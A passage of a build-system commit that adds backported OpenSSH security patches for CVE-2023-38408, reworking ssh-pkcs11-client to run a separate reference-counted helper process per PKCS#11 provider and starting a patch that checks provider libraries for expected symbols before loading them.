33-#endif /* HAVE_EC_KEY_METHOD_NEW */
34+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
35
36 static RSA_METHOD *helper_rsa;
37-#ifdef HAVE_EC_KEY_METHOD_NEW
38+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
39 static EC_KEY_METHOD *helper_ecdsa;
40-#endif /* HAVE_EC_KEY_METHOD_NEW */
41+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
42
43 /* redirect private key crypto operations to the ssh-pkcs11-helper */
44 static void
45@@ -233,10 +233,10 @@ wrap_key(struct sshkey *k)
46 {
47 if (k->type == KEY_RSA)
48 RSA_set_method(k->rsa, helper_rsa);
49-#ifdef HAVE_EC_KEY_METHOD_NEW
50+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
51 else if (k->type == KEY_ECDSA)
52 EC_KEY_set_method(k->ecdsa, helper_ecdsa);
53-#endif /* HAVE_EC_KEY_METHOD_NEW */
54+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
55 else
56 fatal("%s: unknown key type", __func__);
57 }
58@@ -247,7 +247,7 @@ pkcs11_start_helper_methods(void)
59 if (helper_rsa != NULL)
60 return (0);
61
62-#ifdef HAVE_EC_KEY_METHOD_NEW
63+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
64 int (*orig_sign)(int, const unsigned char *, int, unsigned char *,
65 unsigned int *, const BIGNUM *, const BIGNUM *, EC_KEY *) = NULL;
66 if (helper_ecdsa != NULL)
67@@ -257,7 +257,7 @@ pkcs11_start_helper_methods(void)
68 return (-1);
69 EC_KEY_METHOD_get_sign(helper_ecdsa, &orig_sign, NULL, NULL);
70 EC_KEY_METHOD_set_sign(helper_ecdsa, orig_sign, NULL, ecdsa_do_sign);
71-#endif /* HAVE_EC_KEY_METHOD_NEW */
72+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
73
74 if ((helper_rsa = RSA_meth_dup(RSA_get_default_method())) == NULL)
75 fatal("%s: RSA_meth_dup failed", __func__);
76diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
77index a302c79..b56a41b 100644
78--- a/ssh-pkcs11.c
79+++ b/ssh-pkcs11.c
80@@ -78,7 +78,7 @@ struct pkcs11_key {
81
82 int pkcs11_interactive = 0;
83
84-#ifdef HAVE_EC_KEY_METHOD_NEW
85+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
86 static void
87 ossl_error(const char *msg)
88 {
89@@ -89,7 +89,7 @@ ossl_error(const char *msg)
90 error("%s: libcrypto error: %.100s", __func__,
91 ERR_error_string(e, NULL));
92 }
93-#endif /* HAVE_EC_KEY_METHOD_NEW */
94+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
95
96 int
97 pkcs11_init(int interactive)
98@@ -190,10 +190,10 @@ pkcs11_del_provider(char *provider_id)
99
100 static RSA_METHOD *rsa_method;
101 static int rsa_idx = 0;
102-#ifdef HAVE_EC_KEY_METHOD_NEW
103+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
104 static EC_KEY_METHOD *ec_key_method;
105 static int ec_key_idx = 0;
106-#endif
107+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
108
109 /* release a wrapped object */
110 static void
111@@ -492,7 +492,7 @@ pkcs11_rsa_wrap(struct pkcs11_provider *provider, CK_ULONG slotidx,
112 return (0);
113 }
114
115-#ifdef HAVE_EC_KEY_METHOD_NEW
116+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
117 /* openssl callback doing the actual signing operation */
118 static ECDSA_SIG *
119 ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
120@@ -604,7 +604,7 @@ pkcs11_ecdsa_wrap(struct pkcs11_provider *provider, CK_ULONG slotidx,
121
122 return (0);
123 }
124-#endif /* HAVE_EC_KEY_METHOD_NEW */
125+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
126
127 /* remove trailing spaces */
128 static void
129@@ -679,7 +679,7 @@ pkcs11_key_included(struct sshkey ***keysp, int *nkeys, struct sshkey *key)
130 return (0);
131 }
132
133-#ifdef HAVE_EC_KEY_METHOD_NEW
134+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
135 static struct sshkey *
136 pkcs11_fetch_ecdsa_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
137 CK_OBJECT_HANDLE *obj)
138@@ -802,7 +802,7 @@ fail:
139
140 return (key);
141 }
142-#endif /* HAVE_EC_KEY_METHOD_NEW */
143+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
144
145 static struct sshkey *
146 pkcs11_fetch_rsa_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
147@@ -910,7 +910,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
148 #endif
149 struct sshkey *key = NULL;
150 int i;
151-#ifdef HAVE_EC_KEY_METHOD_NEW
152+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
153 int nid;
154 #endif
155 const u_char *cp;
156@@ -999,7 +999,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
157 key->type = KEY_RSA;
158 key->flags |= SSHKEY_FLAG_EXT;
159 rsa = NULL; /* now owned by key */
160-#ifdef HAVE_EC_KEY_METHOD_NEW
161+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
162 } else if (EVP_PKEY_base_id(evp) == EVP_PKEY_EC) {
163 if (EVP_PKEY_get0_EC_KEY(evp) == NULL) {
164 error("invalid x509; no ec key");
165@@ -1030,7 +1030,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
166 key->type = KEY_ECDSA;
167 key->flags |= SSHKEY_FLAG_EXT;
168 ec = NULL; /* now owned by key */
169-#endif /* HAVE_EC_KEY_METHOD_NEW */
170+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
171 } else {
172 error("unknown certificate key type");
173 goto out;
174@@ -1237,11 +1237,11 @@ pkcs11_fetch_keys(struct pkcs11_provider *p, CK_ULONG slotidx,
175 case CKK_RSA:
176 key = pkcs11_fetch_rsa_pubkey(p, slotidx, &obj);
177 break;
178-#ifdef HAVE_EC_KEY_METHOD_NEW
179+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
180 case CKK_ECDSA:
181 key = pkcs11_fetch_ecdsa_pubkey(p, slotidx, &obj);
182 break;
183-#endif /* HAVE_EC_KEY_METHOD_NEW */
184+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
185 default:
186 /* XXX print key type? */
187 key = NULL;
188--
1892.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch
new file mode 100644
index 0000000000..25ba921869
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch
@@ -0,0 +1,581 @@
1From 92cebfbcc221c9ef3f6bbb78da3d7699c0ae56be Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Wed, 19 Jul 2023 14:03:45 +0000
4Subject: [PATCH 02/12] upstream: Separate ssh-pkcs11-helpers for each p11
5 module
6
7Make ssh-pkcs11-client start an independent helper for each provider,
8providing better isolation between modules and reliability if a single
9module misbehaves.
10
11This also implements reference counting of PKCS#11-hosted keys,
12allowing ssh-pkcs11-helper subprocesses to be automatically reaped
13when no remaining keys reference them. This fixes some bugs we have
14that make PKCS11 keys unusable after they have been deleted, e.g.
15https://bugzilla.mindrot.org/show_bug.cgi?id=3125
16
17ok markus@
18
19OpenBSD-Commit-ID: 0ce188b14fe271ab0568f4500070d96c5657244e
20
21Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/099cdf59ce1e72f55d421c8445bf6321b3004755]
22CVE: CVE-2023-38408
23Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
24---
25 ssh-pkcs11-client.c | 372 +++++++++++++++++++++++++++++++++-----------
26 1 file changed, 282 insertions(+), 90 deletions(-)
27
28diff --git a/ssh-pkcs11-client.c b/ssh-pkcs11-client.c
29index 41114c7..4f3c6ed 100644
30--- a/ssh-pkcs11-client.c
31+++ b/ssh-pkcs11-client.c
32@@ -1,4 +1,4 @@
33-/* $OpenBSD: ssh-pkcs11-client.c,v 1.16 2020/01/25 00:03:36 djm Exp $ */
34+/* $OpenBSD: ssh-pkcs11-client.c,v 1.18 2023/07/19 14:03:45 djm Exp $ */
35 /*
36 * Copyright (c) 2010 Markus Friedl. All rights reserved.
37 * Copyright (c) 2014 Pedro Martelletto. All rights reserved.
38@@ -30,12 +30,11 @@
39 #include <string.h>
40 #include <unistd.h>
41 #include <errno.h>
42+#include <limits.h>
43
44 #include <openssl/ecdsa.h>
45 #include <openssl/rsa.h>
46
47-#include "openbsd-compat/openssl-compat.h"
48-
49 #include "pathnames.h"
50 #include "xmalloc.h"
51 #include "sshbuf.h"
52@@ -47,18 +46,140 @@
53 #include "ssh-pkcs11.h"
54 #include "ssherr.h"
55
56+#include "openbsd-compat/openssl-compat.h"
57+
58 /* borrows code from sftp-server and ssh-agent */
59
60-static int fd = -1;
61-static pid_t pid = -1;
62+/*
63+ * Maintain a list of ssh-pkcs11-helper subprocesses. These may be looked up
64+ * by provider path or their unique EC/RSA METHOD pointers.
65+ */
66+struct helper {
67+ char *path;
68+ pid_t pid;
69+ int fd;
70+ RSA_METHOD *rsa_meth;
71+ EC_KEY_METHOD *ec_meth;
72+ int (*rsa_finish)(RSA *rsa);
73+ void (*ec_finish)(EC_KEY *key);
74+ size_t nrsa, nec; /* number of active keys of each type */
75+};
76+static struct helper **helpers;
77+static size_t nhelpers;
78+
79+static struct helper *
80+helper_by_provider(const char *path)
81+{
82+ size_t i;
83+
84+ for (i = 0; i < nhelpers; i++) {
85+ if (helpers[i] == NULL || helpers[i]->path == NULL ||
86+ helpers[i]->fd == -1)
87+ continue;
88+ if (strcmp(helpers[i]->path, path) == 0)
89+ return helpers[i];
90+ }
91+ return NULL;
92+}
93+
94+static struct helper *
95+helper_by_rsa(const RSA *rsa)
96+{
97+ size_t i;
98+ const RSA_METHOD *meth;
99+
100+ if ((meth = RSA_get_method(rsa)) == NULL)
101+ return NULL;
102+ for (i = 0; i < nhelpers; i++) {
103+ if (helpers[i] != NULL && helpers[i]->rsa_meth == meth)
104+ return helpers[i];
105+ }
106+ return NULL;
107+
108+}
109+
110+static struct helper *
111+helper_by_ec(const EC_KEY *ec)
112+{
113+ size_t i;
114+ const EC_KEY_METHOD *meth;
115+
116+ if ((meth = EC_KEY_get_method(ec)) == NULL)
117+ return NULL;
118+ for (i = 0; i < nhelpers; i++) {
119+ if (helpers[i] != NULL && helpers[i]->ec_meth == meth)
120+ return helpers[i];
121+ }
122+ return NULL;
123+
124+}
125+
126+static void
127+helper_free(struct helper *helper)
128+{
129+ size_t i;
130+ int found = 0;
131+
132+ if (helper == NULL)
133+ return;
134+ if (helper->path == NULL || helper->ec_meth == NULL ||
135+ helper->rsa_meth == NULL)
136+ fatal("%s: inconsistent helper", __func__);
137+ debug3("%s: free helper for provider %s", __func__ , helper->path);
138+ for (i = 0; i < nhelpers; i++) {
139+ if (helpers[i] == helper) {
140+ if (found)
141+ fatal("%s: helper recorded more than once", __func__);
142+ found = 1;
143+ }
144+ else if (found)
145+ helpers[i - 1] = helpers[i];
146+ }
147+ if (found) {
148+ helpers = xrecallocarray(helpers, nhelpers,
149+ nhelpers - 1, sizeof(*helpers));
150+ nhelpers--;
151+ }
152+ free(helper->path);
153+ EC_KEY_METHOD_free(helper->ec_meth);
154+ RSA_meth_free(helper->rsa_meth);
155+ free(helper);
156+}
157+
158+static void
159+helper_terminate(struct helper *helper)
160+{
161+ if (helper == NULL) {
162+ return;
163+ } else if (helper->fd == -1) {
164+ debug3("%s: already terminated", __func__);
165+ } else {
166+ debug3("terminating helper for %s; "
167+ "remaining %zu RSA %zu ECDSA", __func__,
168+ helper->path, helper->nrsa, helper->nec);
169+ close(helper->fd);
170+ /* XXX waitpid() */
171+ helper->fd = -1;
172+ helper->pid = -1;
173+ }
174+ /*
175+ * Don't delete the helper entry until there are no remaining keys
176+ * that reference it. Otherwise, any signing operation would call
177+ * a free'd METHOD pointer and that would be bad.
178+ */
179+ if (helper->nrsa == 0 && helper->nec == 0)
180+ helper_free(helper);
181+}
182
183 static void
184-send_msg(struct sshbuf *m)
185+send_msg(int fd, struct sshbuf *m)
186 {
187 u_char buf[4];
188 size_t mlen = sshbuf_len(m);
189 int r;
190
191+ if (fd == -1)
192+ return;
193 POKE_U32(buf, mlen);
194 if (atomicio(vwrite, fd, buf, 4) != 4 ||
195 atomicio(vwrite, fd, sshbuf_mutable_ptr(m),
196@@ -69,12 +190,15 @@ send_msg(struct sshbuf *m)
197 }
198
199 static int
200-recv_msg(struct sshbuf *m)
201+recv_msg(int fd, struct sshbuf *m)
202 {
203 u_int l, len;
204 u_char c, buf[1024];
205 int r;
206
207+ sshbuf_reset(m);
208+ if (fd == -1)
209+ return 0; /* XXX */
210 if ((len = atomicio(read, fd, buf, 4)) != 4) {
211 error("read from helper failed: %u", len);
212 return (0); /* XXX */
213@@ -83,7 +207,6 @@ recv_msg(struct sshbuf *m)
214 if (len > 256 * 1024)
215 fatal("response too long: %u", len);
216 /* read len bytes into m */
217- sshbuf_reset(m);
218 while (len > 0) {
219 l = len;
220 if (l > sizeof(buf))
221@@ -104,14 +227,17 @@ recv_msg(struct sshbuf *m)
222 int
223 pkcs11_init(int interactive)
224 {
225- return (0);
226+ return 0;
227 }
228
229 void
230 pkcs11_terminate(void)
231 {
232- if (fd >= 0)
233- close(fd);
234+ size_t i;
235+
236+ debug3("%s: terminating %zu helpers", __func__, nhelpers);
237+ for (i = 0; i < nhelpers; i++)
238+ helper_terminate(helpers[i]);
239 }
240
241 static int
242@@ -122,7 +248,11 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
243 u_char *blob = NULL, *signature = NULL;
244 size_t blen, slen = 0;
245 int r, ret = -1;
246+ struct helper *helper;
247
248+ if ((helper = helper_by_rsa(rsa)) == NULL || helper->fd == -1)
249+ fatal("%s: no helper for PKCS11 key", __func__);
250+ debug3("%s: signing with PKCS11 provider %s", __func__, helper->path);
251 if (padding != RSA_PKCS1_PADDING)
252 goto fail;
253 key = sshkey_new(KEY_UNSPEC);
254@@ -144,10 +274,10 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
255 (r = sshbuf_put_string(msg, from, flen)) != 0 ||
256 (r = sshbuf_put_u32(msg, 0)) != 0)
257 fatal("%s: buffer error: %s", __func__, ssh_err(r));
258- send_msg(msg);
259+ send_msg(helper->fd, msg);
260 sshbuf_reset(msg);
261
262- if (recv_msg(msg) == SSH2_AGENT_SIGN_RESPONSE) {
263+ if (recv_msg(helper->fd, msg) == SSH2_AGENT_SIGN_RESPONSE) {
264 if ((r = sshbuf_get_string(msg, &signature, &slen)) != 0)
265 fatal("%s: buffer error: %s", __func__, ssh_err(r));
266 if (slen <= (size_t)RSA_size(rsa)) {
267@@ -163,7 +293,26 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
268 return (ret);
269 }
270
271-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
272+static int
273+rsa_finish(RSA *rsa)
274+{
275+ struct helper *helper;
276+
277+ if ((helper = helper_by_rsa(rsa)) == NULL)
278+ fatal("%s: no helper for PKCS11 key", __func__);
279+ debug3("%s: free PKCS11 RSA key for provider %s", __func__, helper->path);
280+ if (helper->rsa_finish != NULL)
281+ helper->rsa_finish(rsa);
282+ if (helper->nrsa == 0)
283+ fatal("%s: RSA refcount error", __func__);
284+ helper->nrsa--;
285+ debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
286+ helper->path, helper->nrsa, helper->nec);
287+ if (helper->nrsa == 0 && helper->nec == 0)
288+ helper_terminate(helper);
289+ return 1;
290+}
291+
292 static ECDSA_SIG *
293 ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
294 const BIGNUM *rp, EC_KEY *ec)
295@@ -175,7 +324,11 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
296 u_char *blob = NULL, *signature = NULL;
297 size_t blen, slen = 0;
298 int r, nid;
299+ struct helper *helper;
300
301+ if ((helper = helper_by_ec(ec)) == NULL || helper->fd == -1)
302+ fatal("%s: no helper for PKCS11 key", __func__);
303+ debug3("%s: signing with PKCS11 provider %s", __func__, helper->path);
304 nid = sshkey_ecdsa_key_to_nid(ec);
305 if (nid < 0) {
306 error("%s: couldn't get curve nid", __func__);
307@@ -203,10 +356,10 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
308 (r = sshbuf_put_string(msg, dgst, dgst_len)) != 0 ||
309 (r = sshbuf_put_u32(msg, 0)) != 0)
310 fatal("%s: buffer error: %s", __func__, ssh_err(r));
311- send_msg(msg);
312+ send_msg(helper->fd, msg);
313 sshbuf_reset(msg);
314
315- if (recv_msg(msg) == SSH2_AGENT_SIGN_RESPONSE) {
316+ if (recv_msg(helper->fd, msg) == SSH2_AGENT_SIGN_RESPONSE) {
317 if ((r = sshbuf_get_string(msg, &signature, &slen)) != 0)
318 fatal("%s: buffer error: %s", __func__, ssh_err(r));
319 cp = signature;
320@@ -220,75 +373,110 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
321 sshbuf_free(msg);
322 return (ret);
323 }
324-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
325
326-static RSA_METHOD *helper_rsa;
327-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
328-static EC_KEY_METHOD *helper_ecdsa;
329-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
330+static void
331+ecdsa_do_finish(EC_KEY *ec)
332+{
333+ struct helper *helper;
334+
335+ if ((helper = helper_by_ec(ec)) == NULL)
336+ fatal("%s: no helper for PKCS11 key", __func__);
337+ debug3("%s: free PKCS11 ECDSA key for provider %s", __func__, helper->path);
338+ if (helper->ec_finish != NULL)
339+ helper->ec_finish(ec);
340+ if (helper->nec == 0)
341+ fatal("%s: ECDSA refcount error", __func__);
342+ helper->nec--;
343+ debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
344+ helper->path, helper->nrsa, helper->nec);
345+ if (helper->nrsa == 0 && helper->nec == 0)
346+ helper_terminate(helper);
347+}
348
349 /* redirect private key crypto operations to the ssh-pkcs11-helper */
350 static void
351-wrap_key(struct sshkey *k)
352+wrap_key(struct helper *helper, struct sshkey *k)
353 {
354- if (k->type == KEY_RSA)
355- RSA_set_method(k->rsa, helper_rsa);
356-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
357- else if (k->type == KEY_ECDSA)
358- EC_KEY_set_method(k->ecdsa, helper_ecdsa);
359-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
360- else
361+ debug3("%s: wrap %s for provider %s", __func__, sshkey_type(k), helper->path);
362+ if (k->type == KEY_RSA) {
363+ RSA_set_method(k->rsa, helper->rsa_meth);
364+ if (helper->nrsa++ >= INT_MAX)
365+ fatal("%s: RSA refcount error", __func__);
366+ } else if (k->type == KEY_ECDSA) {
367+ EC_KEY_set_method(k->ecdsa, helper->ec_meth);
368+ if (helper->nec++ >= INT_MAX)
369+ fatal("%s: EC refcount error", __func__);
370+ } else
371 fatal("%s: unknown key type", __func__);
372+ k->flags |= SSHKEY_FLAG_EXT;
373+ debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
374+ helper->path, helper->nrsa, helper->nec);
375 }
376
377 static int
378-pkcs11_start_helper_methods(void)
379+pkcs11_start_helper_methods(struct helper *helper)
380 {
381- if (helper_rsa != NULL)
382- return (0);
383-
384-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
385- int (*orig_sign)(int, const unsigned char *, int, unsigned char *,
386+ int (*ec_init)(EC_KEY *key);
387+ int (*ec_copy)(EC_KEY *dest, const EC_KEY *src);
388+ int (*ec_set_group)(EC_KEY *key, const EC_GROUP *grp);
389+ int (*ec_set_private)(EC_KEY *key, const BIGNUM *priv_key);
390+ int (*ec_set_public)(EC_KEY *key, const EC_POINT *pub_key);
391+ int (*ec_sign)(int, const unsigned char *, int, unsigned char *,
392 unsigned int *, const BIGNUM *, const BIGNUM *, EC_KEY *) = NULL;
393- if (helper_ecdsa != NULL)
394- return (0);
395- helper_ecdsa = EC_KEY_METHOD_new(EC_KEY_OpenSSL());
396- if (helper_ecdsa == NULL)
397- return (-1);
398- EC_KEY_METHOD_get_sign(helper_ecdsa, &orig_sign, NULL, NULL);
399- EC_KEY_METHOD_set_sign(helper_ecdsa, orig_sign, NULL, ecdsa_do_sign);
400-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
401-
402- if ((helper_rsa = RSA_meth_dup(RSA_get_default_method())) == NULL)
403+ RSA_METHOD *rsa_meth;
404+ EC_KEY_METHOD *ec_meth;
405+
406+ if ((ec_meth = EC_KEY_METHOD_new(EC_KEY_OpenSSL())) == NULL)
407+ return -1;
408+ EC_KEY_METHOD_get_sign(ec_meth, &ec_sign, NULL, NULL);
409+ EC_KEY_METHOD_set_sign(ec_meth, ec_sign, NULL, ecdsa_do_sign);
410+ EC_KEY_METHOD_get_init(ec_meth, &ec_init, &helper->ec_finish,
411+ &ec_copy, &ec_set_group, &ec_set_private, &ec_set_public);
412+ EC_KEY_METHOD_set_init(ec_meth, ec_init, ecdsa_do_finish,
413+ ec_copy, ec_set_group, ec_set_private, ec_set_public);
414+
415+ if ((rsa_meth = RSA_meth_dup(RSA_get_default_method())) == NULL)
416 fatal("%s: RSA_meth_dup failed", __func__);
417- if (!RSA_meth_set1_name(helper_rsa, "ssh-pkcs11-helper") ||
418- !RSA_meth_set_priv_enc(helper_rsa, rsa_encrypt))
419+ helper->rsa_finish = RSA_meth_get_finish(rsa_meth);
420+ if (!RSA_meth_set1_name(rsa_meth, "ssh-pkcs11-helper") ||
421+ !RSA_meth_set_priv_enc(rsa_meth, rsa_encrypt) ||
422+ !RSA_meth_set_finish(rsa_meth, rsa_finish))
423 fatal("%s: failed to prepare method", __func__);
424
425- return (0);
426+ helper->ec_meth = ec_meth;
427+ helper->rsa_meth = rsa_meth;
428+ return 0;
429 }
430
431-static int
432-pkcs11_start_helper(void)
433+static struct helper *
434+pkcs11_start_helper(const char *path)
435 {
436 int pair[2];
437- char *helper, *verbosity = NULL;
438-
439- if (log_level_get() >= SYSLOG_LEVEL_DEBUG1)
440- verbosity = "-vvv";
441-
442- if (pkcs11_start_helper_methods() == -1) {
443- error("pkcs11_start_helper_methods failed");
444- return (-1);
445- }
446+ char *prog, *verbosity = NULL;
447+ struct helper *helper;
448+ pid_t pid;
449
450+ if (nhelpers >= INT_MAX)
451+ fatal("%s: too many helpers", __func__);
452+ debug3("%s: start helper for %s", __func__, path);
453 if (socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == -1) {
454 error("socketpair: %s", strerror(errno));
455- return (-1);
456+ return NULL;
457+ }
458+ helper = xcalloc(1, sizeof(*helper));
459+ if (pkcs11_start_helper_methods(helper) == -1) {
460+ error("pkcs11_start_helper_methods failed");
461+ goto fail;
462 }
463 if ((pid = fork()) == -1) {
464 error("fork: %s", strerror(errno));
465- return (-1);
466+ fail:
467+ close(pair[0]);
468+ close(pair[1]);
469+ RSA_meth_free(helper->rsa_meth);
470+ EC_KEY_METHOD_free(helper->ec_meth);
471+ free(helper);
472+ return NULL;
473 } else if (pid == 0) {
474 if ((dup2(pair[1], STDIN_FILENO) == -1) ||
475 (dup2(pair[1], STDOUT_FILENO) == -1)) {
476@@ -297,18 +485,27 @@ pkcs11_start_helper(void)
477 }
478 close(pair[0]);
479 close(pair[1]);
480- helper = getenv("SSH_PKCS11_HELPER");
481- if (helper == NULL || strlen(helper) == 0)
482- helper = _PATH_SSH_PKCS11_HELPER;
483+ prog = getenv("SSH_PKCS11_HELPER");
484+ if (prog == NULL || strlen(prog) == 0)
485+ prog = _PATH_SSH_PKCS11_HELPER;
486+ if (log_level_get() >= SYSLOG_LEVEL_DEBUG1)
487+ verbosity = "-vvv";
488 debug("%s: starting %s %s", __func__, helper,
489 verbosity == NULL ? "" : verbosity);
490- execlp(helper, helper, verbosity, (char *)NULL);
491- fprintf(stderr, "exec: %s: %s\n", helper, strerror(errno));
492+ execlp(prog, prog, verbosity, (char *)NULL);
493+ fprintf(stderr, "exec: %s: %s\n", prog, strerror(errno));
494 _exit(1);
495 }
496 close(pair[1]);
497- fd = pair[0];
498- return (0);
499+ helper->fd = pair[0];
500+ helper->path = xstrdup(path);
501+ helper->pid = pid;
502+ debug3("%s: helper %zu for \"%s\" on fd %d pid %ld", __func__, nhelpers,
503+ helper->path, helper->fd, (long)helper->pid);
504+ helpers = xrecallocarray(helpers, nhelpers,
505+ nhelpers + 1, sizeof(*helpers));
506+ helpers[nhelpers++] = helper;
507+ return helper;
508 }
509
510 int
511@@ -322,9 +519,11 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
512 size_t blen;
513 u_int nkeys, i;
514 struct sshbuf *msg;
515+ struct helper *helper;
516
517- if (fd < 0 && pkcs11_start_helper() < 0)
518- return (-1);
519+ if ((helper = helper_by_provider(name)) == NULL &&
520+ (helper = pkcs11_start_helper(name)) == NULL)
521+ return -1;
522
523 if ((msg = sshbuf_new()) == NULL)
524 fatal("%s: sshbuf_new failed", __func__);
525@@ -332,10 +531,10 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
526 (r = sshbuf_put_cstring(msg, name)) != 0 ||
527 (r = sshbuf_put_cstring(msg, pin)) != 0)
528 fatal("%s: buffer error: %s", __func__, ssh_err(r));
529- send_msg(msg);
530+ send_msg(helper->fd, msg);
531 sshbuf_reset(msg);
532
533- type = recv_msg(msg);
534+ type = recv_msg(helper->fd, msg);
535 if (type == SSH2_AGENT_IDENTITIES_ANSWER) {
536 if ((r = sshbuf_get_u32(msg, &nkeys)) != 0)
537 fatal("%s: buffer error: %s", __func__, ssh_err(r));
538@@ -350,7 +549,7 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
539 __func__, ssh_err(r));
540 if ((r = sshkey_from_blob(blob, blen, &k)) != 0)
541 fatal("%s: bad key: %s", __func__, ssh_err(r));
542- wrap_key(k);
543+ wrap_key(helper, k);
544 (*keysp)[i] = k;
545 if (labelsp)
546 (*labelsp)[i] = label;
547@@ -371,22 +570,15 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
548 int
549 pkcs11_del_provider(char *name)
550 {
551- int r, ret = -1;
552- struct sshbuf *msg;
553-
554- if ((msg = sshbuf_new()) == NULL)
555- fatal("%s: sshbuf_new failed", __func__);
556- if ((r = sshbuf_put_u8(msg, SSH_AGENTC_REMOVE_SMARTCARD_KEY)) != 0 ||
557- (r = sshbuf_put_cstring(msg, name)) != 0 ||
558- (r = sshbuf_put_cstring(msg, "")) != 0)
559- fatal("%s: buffer error: %s", __func__, ssh_err(r));
560- send_msg(msg);
561- sshbuf_reset(msg);
562-
563- if (recv_msg(msg) == SSH_AGENT_SUCCESS)
564- ret = 0;
565- sshbuf_free(msg);
566- return (ret);
567+ struct helper *helper;
568+
569+ /*
570+ * ssh-agent deletes keys before calling this, so the helper entry
571+ * should be gone before we get here.
572+ */
573+ debug3("%s: delete %s", __func__, name);
574+ if ((helper = helper_by_provider(name)) != NULL)
575+ helper_terminate(helper);
576+ return 0;
577 }
578-
579 #endif /* ENABLE_PKCS11 */
580--
5812.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch
new file mode 100644
index 0000000000..e16e5e245e
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch
@@ -0,0 +1,171 @@
1From 2f1be98e83feb90665b9292eff8bb734537fd491 Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Wed, 19 Jul 2023 14:02:27 +0000
4Subject: [PATCH 03/12] upstream: Ensure FIDO/PKCS11 libraries contain expected
5 symbols
6
7This checks via nlist(3) that candidate provider libraries contain one
8of the symbols that we will require prior to dlopen(), which can cause
9a number of side effects, including execution of constructors.
10
11Feedback deraadt; ok markus
12
13OpenBSD-Commit-ID: 1508a5fbd74e329e69a55b56c453c292029aefbe
14
15Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/29ef8a04866ca14688d5b7fed7b8b9deab851f77]
16CVE: CVE-2023-38408
17Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
18---
19 misc.c | 77 ++++++++++++++++++++++++++++++++++++++++++++++++++++
20 misc.h | 1 +
21 ssh-pkcs11.c | 4 +++
22 ssh-sk.c | 6 ++--
